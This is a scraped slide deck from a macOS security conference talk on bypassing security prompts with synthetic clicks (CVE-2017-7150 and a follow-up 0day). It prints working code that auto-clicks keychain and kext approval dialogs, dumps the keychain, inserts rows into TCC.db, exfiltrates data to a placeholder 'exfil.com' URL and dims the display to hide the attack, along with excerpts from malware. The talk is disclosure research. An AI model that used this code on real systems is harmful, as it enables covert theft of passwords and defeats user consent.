SlideShare a Scribd company logo

The Mouse is mightier than the sword

Priyanka Aash
Priyanka Aash

"In today's digital world the mouse, not the pen is arguably mightier than the sword. Via a single click, countless security mechanisms may be completely bypassed. Run untrusted app? click ...allowed. Authorize keychain access? click ...allowed. Load 3rd-party kernel extension? click ...allowed. Authorize outgoing network connection? click ...allowed. Luckily security-conscious users will (hopefully) heed such warning dialogues—stopping malicious code in its tracks. But what if such clicks can be synthetically generated and interact with such prompts in a completely invisible way? Well, then everything pretty much goes to hell. Of course OS vendors such as Apple are keenly aware of this 'attack' vector, and thus strive to design their UI in a manner that is resistant against synthetic events. Unfortunately they failed. In this talk we'll discuss a vulnerability (CVE-2017-7150) found in all recent versions of macOS that allowed unprivileged code to interact with any UI component including 'protected' security dialogues. Armed with the bug, it was trivial to programmatically bypass Apple's touted 'User-Approved Kext' security feature, dump all passwords from the keychain, bypass 3rd-party security tools, and much more! And as Apple's patch was incomplete (surprise surprise) we'll drop an 0day that (still) allows unprivileged code to post synthetic events and bypass various security mechanisms on a fully patched macOS box! And while it may seem that such synthetic interactions with the UI will be visible to the user, we'll discuss an elegant way to ensure they happen completely invisibly!"

Technology
1 of 63
Download to read offline
digita security The Mouse is mightier than the sword
WHOIS cybersecurity solutions for the macOS enterprise @patrickwardle synack digitansanasa
Outline the targets (past) attacks mitigations full bypass weaponization
digita security THE TARGETS 'tempting' UI components
The Attacker's Conundrum keychain kexts keylogger firewalls } alert! many 'useful' actions (e.g. accessing the keychain, loading a kext, etc.) now generate an alert that (ideally) the user must explicitly interact with. #security
The Goal avoid all together dismiss (via code) for alerts: $ ./dumpKeychain of course, Apple tries to prevent both these scenarios! ...more on this shortly ;) //query keychain logic ... //bypass // pseudo-code if(accessAlertWindow) { sendClick(); } dismiss alert via code?! " "
The Targets the macOS keychain $ /usr/bin/security dump-keychain -d login.keychain keychain: "~/Library/Keychains/login.keychain-db" class: "genp" attributes: 0x00000007 <blob>="GitHub - https://api.github.com" data: "7257b03422bbab65f0e7d22be57c0b944a0ae45d9e" private keys passwords certificates autofill data dumping keys } auth tokens Keychain Access.app app data access alerts (UI) as normal user!
hunter2 The Targets 'Security & Privacy' › 'Accessibility' "Apps with access to the accessibility API are allowed to manipulate the UIs of other applications. This gives them the ability to inject events into other processes, and allows them do pretty much anything you can. They can also log all your keystrokes." -superuser.com UI events & manipulations keylogging! Accessibility Pane }
The Targets "User-Approved Kernel Extension Loading" "I got 99 Problems, but Little Snitch ain’t one!" -Wardle/DefCon '16 "macOS High Sierra introduces a new feature that requires user approval before loading new third-party kernel extensions" -apple.com Technical Note TN2459: "User-Approved Kext Loading" 
 -apple.com approval required " "
The Targets Security Alerts/(3rd-party)Tools $ nc -l 1337 macOS firewall alert blockblock alert ransomwhere? alert Allow " "
digita security (PAST) ATTACKS alerts & prompts; hackers vs. apple
The Attacks alerts: attack vectors applescript coregraphics UI 'bypass' ??? avoid all together || dismiss (via code)
AppleScript "AppleScript is primarily an inter-application processing system, designed to exchange data between and control other applications" -wikipedia.com in context of remote process! $ cat evil.scpt do shell script "say hi" with administrator privileges $ osascript evil.scpt trusted auth prompt? clicks //firewall bypass tell application "Safari" run tell application "Finder" to set visible of process "Safari" to false make new document set the URL of document 1 to "https://exfil.com?data=blah" end tell actions = or }
automated keychain access AppleScript commands //keychain bypass // note: only works on older version of macOS tell application "System Events" repeat while exists (processes where name is "SecurityAgent") tell process "SecurityAgent" click button "Allow" of group 1 of window 1 end tell delay 0.2 end repeat end tell keychain access prompt clicking 'Allow' via AppleScript $ security dump-keychain ... class: "genp" attributes: ... "acct"<blob>="patrickwardle" "svce"<blob>="www.bankofamerica.com" password: "hunter2" passwords! Allow " "
kd.sh automated keychain access (OSX.DevilRobber) AppleScript sub_26FA proc near push ebp mov ebp, esp sub esp, 18h mov [esp+18h+var_18], "./kc_dump.sh" call _system$UNIX2003 $ cat kc_dump.sh #!/bin/sh ./kd.sh & for i in {1..300} do osascript kcd.scpt done $ cat kd.sh #!/bin/sh security dump-keychain -d > s_dump.txt OSX/DevilRobber kc_dump.sh kcd.scpt thanks @noarfromspace :) Always Allow " "
CoreGraphics APIs "Core Graphics...includes services for working with display hardware, low- level user input events, and the windowing system" -apple 'A' 'A' 'A' 'sniffMK' github.com/objective-see/sniffMK //install & enable CG "event tap" eventMask = CGEventMaskBit(kCGEventKeyDown) | CGEventMaskBit(kCGEventKeyUp); CGEventTapCreate(kCGSessionEventTap, kCGHeadInsertEventTap, 0, eventMask, eventCallback, NULL); CGEventTapEnable(eventTap, true); sniffing keys via 'core graphics' core graphics keylogger
CoreGraphics APIs Allow post synthetic keyboard & mouse events! core graphics " "
posting a synthetic 'enter' key press CoreGraphics APIs #import <CoreGraphics/CoreGraphics.h> const CGKeyCode ENTER_KEY = (CGKeyCode) 76; void pressENTER() { CGPostKeyboardEvent((CGCharCode)0, ENTER_KEY, true); CGPostKeyboardEvent((CGCharCode)0, ENTER_KEY, false); } synthetically generating an 'enter' keypress Deny Allow perform action 
 (that triggers alert) post a synthetic 'enter' (to dismiss/allow, etc.) " "
CoreGraphics APIs synthetic mouse events (OSX.FruitFly) int sub_100001c50(int arg0, int arg1) { rbx = CGEventCreateMouseEvent(0x0, rcx, rdx, rcx); CGEventSetIntegerValueField(rbx, 0x1, r12); CGEventPost(0x1, rbx); CFRelease(rbx); } sub-cmd description 0 move 1 left click (up & down) 2 left click (up & down) 3 left double click 4 left click (down) 5 left click (up) 6 right click (down) 7 right click (up) cmd #8 
 (0,123,456) # ./sniffMK event: kCGEventMouseMoved (x: 123.000000, y: 456.000000) mouse move (x,y) OSX/FruitFly's synthetic mouse capabilities
CoreGraphics APIs synthetic keyboard events (OSX.FruitFly) # sniffMK event: kCGEventKeyDown keycode: 0x0/'a' cmd #16, 65 # sniffMK event: kCGEventKeyUp keycode: 0x0/'a' cmd #17, 65 remote typing keydown: AXUIElementPostKeyboardEvent(var_290, 0x0, sub_100001980(rax) & 0xffff, 0x1); goto leave; keyup: AXUIElementPostKeyboardEvent(var_290, 0x0, sub_100001980(rax) & 0xffff, 0x0); goto leave; invokesCGPostKeyboardEvent
CoreGraphics APIs synthetic mouse events (OSX/Genieo) $ jtool -d objc -v Installer.app/Contents/MacOS/AppAS @interface SafariExtensionInstaller : ? ... /* 2 - 0x1000376e1 */ + getPopupPosition; ... /* 4 - 0x100037c53 */ + clickOnInstallButton; /* 5 - 0x100037d71 */ + clickOnAllowButtonKeychain; .... /* 8 - 0x100038450 */ + clickOnTrustButton; char +[SafariExtensionInstaller clickOnInstallButton]{ (@selector(getPopupPosition))(&var_40); r14 = CGEventCreateMouseEvent(0x0, 0x5, 0x0, rcx); r15 = CGEventCreateMouseEvent(0x0, 0x1, 0x0, rcx); rbx = CGEventCreateMouseEvent(0x0, 0x2, 0x0, rcx); CGEventPost(0x0, r14); CGEventPost(0x0, r15); CGEventPost(0x0, rbx); " " genieo installer extension installation (safari)
CoreGraphics APIs synthetic mouse events (pwnsdx/Unsecure) void doEvent(CGPoint initialMousePosition, CGEventType event) { CGEventRef currentEvent = CGEventCreateMouseEvent(NULL, event, CGPointMake(initialMousePosition.x, initialMousePosition.y), kCGMouseButtonLeft); 
 CGEventPost(kCGHIDEventTap, currentEvent);
 } void clickOnButton(CGPoint initialMousePosition, CGPoint oldLocation) {
 doEvent(initialMousePosition, kCGEventLeftMouseDown); doEvent(initialMousePosition, kCGEventLeftMouseUp);
 ... } int main(int argc, const char * argv[]) { // Little Flocker bypass if([kCGWindowOwnerName isEqualToString:@"Little Flocker"] && [kCGWindowLayer intValue] == 2147483631 && [kCGWindowIsOnscreen intValue] == 1) { clickOnButton(CGPointMake([[kCGWindowBounds valueForKey:@"X"] intValue] + 666, [[kCGWindowBounds valueForKey:@"Y"] intValue] + 280), oldLocation); } // Little Snitch bypass if([kCGWindowName isEqualToString:@"Little Snitch"] && [kCGWindowOwnerName isEqualToString:@"Little Snitch Agent"] && [kCGWindowLayer intValue] == 1490 && [kCGWindowIsOnscreen intValue] == 1) { clickOnButton(CGPointMake([[kCGWindowBounds valueForKey:@"X"] intValue] + 587, [[kCGWindowBounds valueForKey:@"Y"] intValue] + 340), oldLocation); } https://github.com/pwnsdx/Unsecure Allow " " AV products firewalls
UI 'bypass' (as we'll see) many UI interfaces are now protected by Apple. However, if one can bypass the UI (i.e. direct file i/o) - no alert will be shown? trusted applications ‣ browser ‣ chat client ‣ email client add ‣ browser ‣ chat client ‣ email client ‣ hacker tool add 'hacker tool' " " ‣ hacker tool
04/2015 UI 'bypass' enabling 'assistive access' for keylogging (OSX.XSLCmd) reverse shell screen capture keylogging "a previously unknown variant of the APT backdoor XSLCmd which is designed to compromise Apple OS X systems" -fireeye (09/2014) how can OSX/XSLCmd keylog without root? rootpipe: os/x bug, create any file as root!
UI 'bypass' enabling 'assistive access' for keylogging (OSX.XSLCmd) r12 = [Authenticator sharedAuthenticator]; rax = [SFAuthorization authorization]; rax = [rax obtainWithRight:"system.preferences" flags:0x3 error:0x0]; [r12 authenticateUsingAuthorizationSync:rbx]; rbx = [NSDictionary dictionaryWithObject:@(0x124) forKey:*_NSFilePosixPermissions]; rax = [NSData dataWithBytes:"a" length:0x1]; rax = [UserUtilities createFileWithContents:rax path:@"/var/db/.AccessibilityAPIEnabled" attributes:rbx]; /var/db/.AccessibilityAPIEnabled =enable access (via UI) OSX/XSLCmd keyloggging! " " via rootpipe
UI 'bypass' enabling 'assistive access' for ...? (Dropbox) "Dropbox didn’t ask for permission to take control of your computer" - phil stokes "Revealing Dropbox’s Dirty Little Security Hack" applehelpwriter.com/2016/08/29/discovering-how-dropbox-hacks-your-mac/ where was the "accessibility" prompt?! Dropbox Installer
UI 'bypass' enabling 'assistive access' for ...? (Dropbox) "Revealing Dropbox’s Dirty Little Security Hack" applehelpwriter.com/2016/08/29/discovering-how-dropbox-hacks-your-mac/ /Library/Application Support/ com.apple.TCC/TCC.db INSERT INTO access VALUES('kTCCServiceAccessibility',
 'com.getdropbox.dropbox',0,1,0); } strings in 'dbaccessperm' so dropbox is inserting itself directly into TCC.db...
UI 'bypass' enabling 'assistive access' for ...? (Dropbox) "Revealing Dropbox’s Dirty Little Security Hack" applehelpwriter.com/2016/08/29/discovering-how-dropbox-hacks-your-mac/ $ file "/Library/Application Support/com.apple.TCC/TCC.db" /Library/Application Support/com.apple.TCC/TCC.db: SQLite 3.x database # fs_usage -w -f filesystem | grep -i tcc.db /Library/Application Support/com.apple.TCC/TCC.db-journal /Library/Application Support/com.apple.TCC/TCC.db-wal avoids this ;) UI, backed by TCC.db
UI 'bypass' TCC.db modification (OSX.ColdRoot) __const:001D2804 "touch /private/var/db/.AccessibilityAPIEnabled && sqlite3 "/Library/ Application Support/com.apple.TCC/TCC.db" "INSERT or REPLACE INTO access (service, client, client_type, allowed, prompt_count) VALUES ('kTCCServiceAccessibility'.... com.apple.audio.driver.app unsigned packed password } 'TCC.db' reference...
UI 'bypass' TCC.db modification (OSX.ColdRoot) $ cat /private/var/tmp/runme.sh #!/bin/sh touch /private/var/db/.AccessibilityAPIEnabled && sqlite3 "/Library/Application Support/com.apple.TCC/TCC.db" "INSERT or REPLACE INTO access (service, client, client_type, allowed, prompt_count) VALUES ('kTCCServiceAccessibility', 'com.apple.audio.driver', 0, 1, 0);" auth prompt accessibly access
digita security MITIGATIONS how Apple (et. al) protect the UI
Blocking AppleScript UI Interactions commands tell process "SecurityAgent" click button "Allow" .... end tell " " $ log show tccd PID[44854] is checking access for target PID[44855] tccd Service kTCCServiceAccessibility does not allow prompting; returning preflight_unknown execution error: System Events got an error: osascript is not allowed assistive access. (-1719) OS alert try click... log messages tccd access check?
Blocking AppleScript # fs_usage -w -f filesystem | grep tccd RdData /Library/Application Support/com.apple.TCC/TCC.db tccd open /Applications/Utilities/Terminal.app/Contents/MacOS/Terminal tccd access /Applications/Utilities/Terminal.app/Contents/_CodeSignature tccd WrData /Library/Application Support/com.apple.TCC/TCC.db tccd tccd is an OS daemon that manages the privacy database, TCC.db " " tccd, checks TCC.db tccd interactions with TCC.db Blocking AppleScript UI Interactions TCC.db
Blocking Core Graphic Events " " password prompt Core Graphics events may now trigger an authentication prompt, or be ignored when sent to 'protected' OS alerts!
Blocking Core Graphic Events default 08:52:57.441538 -1000 tccd PID[209] is checking access for target PID[25349] error 08:52:57.657628 -1000 WindowServer Sender is prohibited from synthesizing events int post_filtered_event_tap_data(int arg0, int arg1, int arg2, int arg3, int arg4, int arg5) if (CGXSenderCanSynthesizeEvents() == 0x0) goto loc_702e9; loc_702e9: if (os_log_type_enabled(*_default_log, 0x10) != 0x0) { rbx = *_default_log; _os_log_error_impl(..., rbx, 0x10, "Sender is prohibited from synthesizing events",...); } int CGXSenderCanSynthesizeEvents() { ... rax = sandbox_check_by_audit_token("hid-control", 0x0, rdx, rdx); user-mode check: 
 'CGXSenderCanSynthesizeEvents' kernel-mode check: 'mpo_iokit_check_hid_control_t'
Protecting TCC.db $ ls -lartO "/Library/Application Support/com.apple.TCC/TCC.db" 
 -rw-r--r-- 1 root wheel restricted TCC.db; now protected by SIP #_ cmp byte ptr [eax+38h], 0 jz short accessibilityError mov cl, 0 lea edx, "/private/var/tmp/" lea eax, "Accessibility OK " call _DEBUGUNIT_$$_LOGKEY$ANSISTRING$ANSISTRING$BOOLEAN mov edx, 1 mov eax, ds:(_VMT_$KEYLOSER_$$_TKEYLOGGERTHREAD_ptr - 11D95h)[ebx] call _KEYLOSER$_$TKEYLOGGERTHREAD_$__$$_CREATE$$TKEYLOGGERTHREAD jmp short continue accessibilityError: mov cl, 0 lea edx, "/private/var/tmp/tmp34322gsdlj.log" lea eax, "Accessibility Error " call _DEBUGUNIT_$$_LOGKEY$ANSISTRING$ANSISTRING$BOOLEAN TCC.db OSX/Coldroot SIP == no keylogging!
Summarizing Apple's Protections AppleScript require
 'accessibility rights' UI 'bypass' protect privacy database (TCC.db) with SIP CoreGraphics filter 'synthetic events' though, only 'OS-security-relevant' windows are protected!? think 3rd-party security products...
3rd-party Protection BlockBlock " " -(void)mouseDown:(NSEvent *)event { //get event's pid & uid processID = CGEventGetIntegerValueField(event.CGEvent, kCGEventSourceUnixProcessID); processUID = CGEventGetIntegerValueField(event.CGEvent, kCGEventSourceUserID); //block if: // a) not: root, or uid (root) or uid (_hidd) // b) not: not an apple-signed binary if( (0 != processID) && (0 != processUID) && (HID_UID != processUID) && (YES != binary.isApple) ) { //bail logMsg(LOG_ERR, "ignoring simulated mouse event"); return; } //allow [super mouseDown:event]; user click pid: 0
 uid: 0
3rd-party Protection LittleSnitch (firewall)
3rd-party Protection char -[NSEvent isSimulated]{ rbx = self; rax = [self type]; //type of event (mouse/keyboard?) if ((rax <= 0xb) && (!(BIT_TEST(0xc06, rax)))) { //get cg event rbx = sub_10003034b(rbx); //check 'kCGEventSourceStateID' (0x2d) and 'kCGEventSourceUnixProcessID' (0x29) if (((rbx != 0x0) && (CGEventGetIntegerValueField(rbx, 0x2d) != 0x1)) && (CGEventGetIntegerValueField(rbx, 0x29) != getpid())) { //get path rbx = sub_10003039e(rbx); //exceptions for 'ScreensharingAgent' and 'AppleVNCServer' if ([sub_100030478() containsObject:rbx] != 0x0) { rcx = 0x0; } else { rcx = 0x1; } } else { rcx = 0x0; } } rax = rcx & 0xff; return rax; } LittleSnitch (firewall) kCGEventSourceStateID Little Snitch's synthetic event detection
digita security FINDING A BYPASS synthetically interact with the UI
The Goal target: High Sierra privs: Normal user (no root) goal: Programmatically interact with any OS UI prompt bypass Apple's UI protections allowdeny! x <process> is trying to access <stuff> alert! " " } keychain kexts bypass apple's protections
'Mouse Keys' your keyboard is now the mouse "you can move the mouse pointer and press the mouse button using the keyboard" -apple apple docs mouse keyboard mappings = click i or 5 will Apple 'allow'?!
Enabling Mouse Keys //enable 'mouse keys' void enableMK(float X, float Y){
 //apple script NSAppleScript* scriptObject = [[NSAppleScript alloc] initWithSource: @"tell application "System Preferences"n" "activaten" "reveal anchor "Mouse" of pane id "com.apple.preference.universalaccess"n" "end tell"]; //exec [scriptObject executeAndReturnError:nil]; //let it finish sleep(1); //clicky clicky CGPostMouseEvent(CGPointMake(X, Y), true, 1, true); CGPostMouseEvent(CGPointMake(X, Y), true, 1, false); return; } " " launch: System Preferences open: Accessibility pane, and show Mouse anchor click: 'Enable Mouse Keys' enabling 'Mouse Keys' in code
Sending a click //click via mouse key void clickAllow(float X, float Y) { //move mouse CGEventPost(kCGHIDEventTap, CGEventCreateMouseEvent(nil, kCGEventMouseMoved, CGPointMake(X, Y), kCGMouseButtonLeft)); //apple script NSAppleScript* scriptObject = [[NSAppleScript alloc] initWithSource: @"tell application "System Events" to key code 87n"]; //exec [scriptObject executeAndReturnError:nil]; } sending a synthetic click note: keypad 5: key code 87 # ./sniffMK event: key down keycode: 0x57/87/5 event: key up keycode: 0x57/87/5 event: left mouse down (x: 146.207031, y: 49.777344) event: left mouse up (x: 146.207031, y: 49.777344)the key press also generates a 'mouse' event that apple does not block!!
digita security WEAPONIZATION time to play!
Dumping the Keychain all your passwords/keys are belong to us private keys passwords auth tokens $ /usr/bin/security dump-keychain -d login.keychain keychain: "~/Library/Keychains/login.keychain-db" class: "genp" attributes: 0x00000007 <blob>="GitHub - https://api.github.com" dumping keys } " " mouse click to 'allow' data: "7257b03422bbab65f0e7d22be57c0b944a0ae45d9e"
Dumping the Keychain 'KeychainStealer' PoC
Bypassing 'User-Approved Kernel Extension Loading' # loadKext evil.kext [+] invoking kext load [+] opening security & privacy pane [+] sending 'click' to allow [+] success! 'evil.kext' loaded //init apple script // open 'General' tab of 'Security Pane' scriptObject = [[NSAppleScript alloc] initWithSource: @"tell application "System Preferences"n" "activaten" "reveal anchor "General" of pane id "com.apple.preference.security"n" "end telln"]; //execute to open prefs [scriptObject executeAndReturnError:nil]; high sierra kext loader open 'General' tab of 'Security & Privacy' pane " "
Making these attacks 'invisible' allow x <process> is trying to access <stuff> alert! " "deny! Q: "how can synthetic events interact with the UI in a manner that is not visible to the user?" the obvious problem: visibility... A: display brightness = 0
Making these attacks 'invisible' void setBrightnessTo(float level) { io_iterator_t iterator;
 io_object_t service; IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("IODisplayConnect"), &iterator); while ((service = IOIteratorNext(iterator))) { IODisplaySetFloatParameter(service, kNilOptions, CFSTR(kIODisplayBrightnessKey), level); IOObjectRelease(service); } IOObjectRelease(iterator); } " " dimming the display level: 0 is 'off' UI interactions still possible when screen dimmed! screen brightness ftw!
Making these attacks 'invisible' wait to dim until the user is inactive CFTimeInterval idleTime() { return CGEventSourceSecondsSinceLastEventType( kCGEventSourceStateHIDSystemState, kCGAnyInputEventType); } while(idleTime() < 60.0) { [NSThread sleepForTimeInterval:5.0f]; } //user inactive // a) screen brightness to 0 // b) enable mouse keys & click clack! detecting 'inactive' user
Making these attacks 'invisible' wait to dim until the display is going to sleep OS sends kIOMessageCanDevicePowerOff OS sends kIOMessageDeviceWillPowerOff screen dims to 50% screen dims to 100%, then off }dim to 100% exploit(); " " void displayCallback(void *context, io_service_t y, natural_t msgType, void *msgArgument){ if(kIOMessageCanDevicePowerOff == msgType) //a) dim to 100% //b) exploit! } display = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceNameMatching("IODisplayWrangler")); IOServiceAddInterestNotification(IONotificationPortCreate(kIOMasterPortDefault), display, kIOGeneralInterest, displayCallback, NULL, &notifier); CFRunLoopAddSource(CFRunLoopGetMain(), IONotificationPortGetRunLoopSource(IONotificationPortCreate(kIOMasterPortDefault)),kCFRunLoopDefaultMode); detecting display going to sleep
digita security CONCLUSION wrapping this up
" " Patching 'Mouse Keys' & Synthetic Events CVE-2017-7150, High Sierra Supplemental Update High Sierra "Supplemental Update" password prompt password prompt $ log stream | grep mouse Dropping mouse down event because sender's PID (899) isn't 0 or self (828) filtration of synthetic events
...one more thing: an 0day still trivial way to generate synthetic events! //given some point {x, y} // generate synthetic event... CGPostMouseEvent(point, true, 1, true); CGPostMouseEvent(point, true, 1, true); mouse down mouse down ...AGAIN!! Q: Even after Apple's patch can you send two "mouse down" events to generate an ALLOWED synthetic mouse click?
 A: Yes, really... synthetically click away! and yes, this means since its introduction "user-approved kext loading" has NEVER been secure!
a truly powerful capability Synthetic Reality dump keychain approve kexts capture keystrokes thwart tools allowdeny! x <process> is trying to access <stuff> alert! " " }
the cat & mouse game continues! Synthetic Reality apple script core graphics UI bypass mouse keys passwords accessibility access system integrity protection filter synthetic events vs. macOS Mojave generically blocks: applescript interactions core graphics apis
...ok, one more last thing! "Objective by the Sea" conference ObjectiveByTheSea.com Maui, Hawaii Nov 3rd/4th All things macOS malware bugs security Free for Objective-See patrons!
Finale @patrickwardle patrick@digitasecurity.com cybersecurity solutions for the macOS enterprise digita security
Credits - iconexperience.com - wirdou.com/2012/02/04/is-that-bad-doctor - http://pre04.deviantart.net/2aa3/th/pre/f/ 2010/206/4/4/441488bcc359b59be409ca02f863e843.jpg
 
 - opensource.apple.com - newosxbook.com (*OS Internals) - "Revealing Dropbox’s Dirty Little Security Hack"
 applehelpwriter.com/2016/08/29/discovering-how- dropbox-hacks-your-mac/ images resources

Recommended

[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one![DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!Synack
 
RSA OSX Malware
RSA OSX MalwareRSA OSX Malware
RSA OSX MalwareSynack
 
OS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorOS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorSynack
 
Black Hat '15: Writing Bad @$$ Malware for OS X
Black Hat '15: Writing Bad @$$ Malware for OS XBlack Hat '15: Writing Bad @$$ Malware for OS X
Black Hat '15: Writing Bad @$$ Malware for OS XSynack
 
Android wearpp
Android wearppAndroid wearpp
Android wearppPaul Trebilcox-Ruiz
 
Deep Dive into Zone.JS
Deep Dive into Zone.JSDeep Dive into Zone.JS
Deep Dive into Zone.JSIlia Idakiev
 
Automated malware analysis
Automated malware analysisAutomated malware analysis
Automated malware analysisIbrahim Baliç
 
MBL205 Monetizing Your App on Kindle Fire - AWS re: Invent 2012
MBL205 Monetizing Your App on Kindle Fire - AWS re: Invent 2012MBL205 Monetizing Your App on Kindle Fire - AWS re: Invent 2012
MBL205 Monetizing Your App on Kindle Fire - AWS re: Invent 2012Amazon Web Services
 

Recommended

[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one![DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!Synack
 
RSA OSX Malware
RSA OSX MalwareRSA OSX Malware
RSA OSX MalwareSynack
 
OS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorOS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorSynack
 
Black Hat '15: Writing Bad @$$ Malware for OS X
Black Hat '15: Writing Bad @$$ Malware for OS XBlack Hat '15: Writing Bad @$$ Malware for OS X
Black Hat '15: Writing Bad @$$ Malware for OS XSynack
 
Android wearpp
Android wearppAndroid wearpp
Android wearppPaul Trebilcox-Ruiz
 
Deep Dive into Zone.JS
Deep Dive into Zone.JSDeep Dive into Zone.JS
Deep Dive into Zone.JSIlia Idakiev
 
Automated malware analysis
Automated malware analysisAutomated malware analysis
Automated malware analysisIbrahim Baliç
 
MBL205 Monetizing Your App on Kindle Fire - AWS re: Invent 2012
MBL205 Monetizing Your App on Kindle Fire - AWS re: Invent 2012MBL205 Monetizing Your App on Kindle Fire - AWS re: Invent 2012
MBL205 Monetizing Your App on Kindle Fire - AWS re: Invent 2012Amazon Web Services
 
Top Ten Web Defenses - DefCamp 2012
Top Ten Web Defenses - DefCamp 2012Top Ten Web Defenses - DefCamp 2012
Top Ten Web Defenses - DefCamp 2012DefCamp
 
Arduino、Web 到 IoT
Arduino、Web 到 IoTArduino、Web 到 IoT
Arduino、Web 到 IoTJustin Lin
 
Praktik Pengembangan Konten E-Learning HTML5 Sederhana
Praktik Pengembangan Konten E-Learning HTML5 SederhanaPraktik Pengembangan Konten E-Learning HTML5 Sederhana
Praktik Pengembangan Konten E-Learning HTML5 SederhanaMuhammad Yusuf
 
Android Best Practices
Android Best PracticesAndroid Best Practices
Android Best PracticesYekmer Simsek
 
Improving android experience for both users and developers
Improving android experience for both users and developersImproving android experience for both users and developers
Improving android experience for both users and developersPavel Lahoda
 
Droidcon2013 android experience lahoda
Droidcon2013 android experience lahodaDroidcon2013 android experience lahoda
Droidcon2013 android experience lahodaDroidcon Berlin
 
Using npm to Manage Your Projects for Fun and Profit - USEFUL INFO IN NOTES!
Using npm to Manage Your Projects for Fun and Profit - USEFUL INFO IN NOTES!Using npm to Manage Your Projects for Fun and Profit - USEFUL INFO IN NOTES!
Using npm to Manage Your Projects for Fun and Profit - USEFUL INFO IN NOTES!async_io
 
WebLogic Administration und Deployment mit WLST
WebLogic Administration und Deployment mit WLSTWebLogic Administration und Deployment mit WLST
WebLogic Administration und Deployment mit WLSTenpit GmbH & Co. KG
 
Mach-O par Stéphane Sudre
Mach-O par Stéphane SudreMach-O par Stéphane Sudre
Mach-O par Stéphane SudreCocoaHeads France
 
Node.js 0.8 features
Node.js 0.8 featuresNode.js 0.8 features
Node.js 0.8 featuresNicholas McClay
 
Config mp
Config mpConfig mp
Config mpJuan Manuel Santa Cruz
 
Beacons, Raspberry Pi & Node.js
Beacons, Raspberry Pi & Node.jsBeacons, Raspberry Pi & Node.js
Beacons, Raspberry Pi & Node.jsJeff Prestes
 
Alexey Buzdin "Maslow's Pyramid of Android Testing"
Alexey Buzdin "Maslow's Pyramid of Android Testing"Alexey Buzdin "Maslow's Pyramid of Android Testing"
Alexey Buzdin "Maslow's Pyramid of Android Testing"IT Event
 
There's Waldo by Patrick Wardle & Colby Moore
There's Waldo by Patrick Wardle & Colby MooreThere's Waldo by Patrick Wardle & Colby Moore
There's Waldo by Patrick Wardle & Colby MooreShakacon
 
Micro app-framework
Micro app-frameworkMicro app-framework
Micro app-frameworkMichael Dawson
 
Eddystone Beacons - Physical Web - Giving a URL to All Objects
Eddystone Beacons - Physical Web - Giving a URL to All ObjectsEddystone Beacons - Physical Web - Giving a URL to All Objects
Eddystone Beacons - Physical Web - Giving a URL to All ObjectsJeff Prestes
 
10 Excellent Ways to Secure Your Spring Boot Application - Devoxx Morocco 2019
10 Excellent Ways to Secure Your Spring Boot Application - Devoxx Morocco 201910 Excellent Ways to Secure Your Spring Boot Application - Devoxx Morocco 2019
10 Excellent Ways to Secure Your Spring Boot Application - Devoxx Morocco 2019Matt Raible
 
Bonnes pratiques de développement avec Node js
Bonnes pratiques de développement avec Node jsBonnes pratiques de développement avec Node js
Bonnes pratiques de développement avec Node jsFrancois Zaninotto
 
Hopping in clouds: a tale of migration from one cloud provider to another
Hopping in clouds: a tale of migration from one cloud provider to anotherHopping in clouds: a tale of migration from one cloud provider to another
Hopping in clouds: a tale of migration from one cloud provider to anotherMichele Orselli
 
Maven + Jsf + Richfaces + Jxl + Jdbc - Complete Code Example
Maven + Jsf + Richfaces + Jxl + Jdbc - Complete Code ExampleMaven + Jsf + Richfaces + Jxl + Jdbc - Complete Code Example
Maven + Jsf + Richfaces + Jxl + Jdbc - Complete Code ExampleNikhil Bhalwankar
 
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destructionDEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destructionFelipe Prado
 
Zeronights 2016 - Automating iOS blackbox security scanning
Zeronights 2016 - Automating iOS blackbox security scanningZeronights 2016 - Automating iOS blackbox security scanning
Zeronights 2016 - Automating iOS blackbox security scanningSynack
 

More Related Content

What's hot

Top Ten Web Defenses - DefCamp 2012
Top Ten Web Defenses - DefCamp 2012Top Ten Web Defenses - DefCamp 2012
Top Ten Web Defenses - DefCamp 2012DefCamp
 
Arduino、Web 到 IoT
Arduino、Web 到 IoTArduino、Web 到 IoT
Arduino、Web 到 IoTJustin Lin
 
Praktik Pengembangan Konten E-Learning HTML5 Sederhana
Praktik Pengembangan Konten E-Learning HTML5 SederhanaPraktik Pengembangan Konten E-Learning HTML5 Sederhana
Praktik Pengembangan Konten E-Learning HTML5 SederhanaMuhammad Yusuf
 
Android Best Practices
Android Best PracticesAndroid Best Practices
Android Best PracticesYekmer Simsek
 
Improving android experience for both users and developers
Improving android experience for both users and developersImproving android experience for both users and developers
Improving android experience for both users and developersPavel Lahoda
 
Droidcon2013 android experience lahoda
Droidcon2013 android experience lahodaDroidcon2013 android experience lahoda
Droidcon2013 android experience lahodaDroidcon Berlin
 
Using npm to Manage Your Projects for Fun and Profit - USEFUL INFO IN NOTES!
Using npm to Manage Your Projects for Fun and Profit - USEFUL INFO IN NOTES!Using npm to Manage Your Projects for Fun and Profit - USEFUL INFO IN NOTES!
Using npm to Manage Your Projects for Fun and Profit - USEFUL INFO IN NOTES!async_io
 
WebLogic Administration und Deployment mit WLST
WebLogic Administration und Deployment mit WLSTWebLogic Administration und Deployment mit WLST
WebLogic Administration und Deployment mit WLSTenpit GmbH & Co. KG
 
Beacons, Raspberry Pi & Node.js
Beacons, Raspberry Pi & Node.jsBeacons, Raspberry Pi & Node.js
Beacons, Raspberry Pi & Node.jsJeff Prestes
 
Alexey Buzdin "Maslow's Pyramid of Android Testing"
Alexey Buzdin "Maslow's Pyramid of Android Testing"Alexey Buzdin "Maslow's Pyramid of Android Testing"
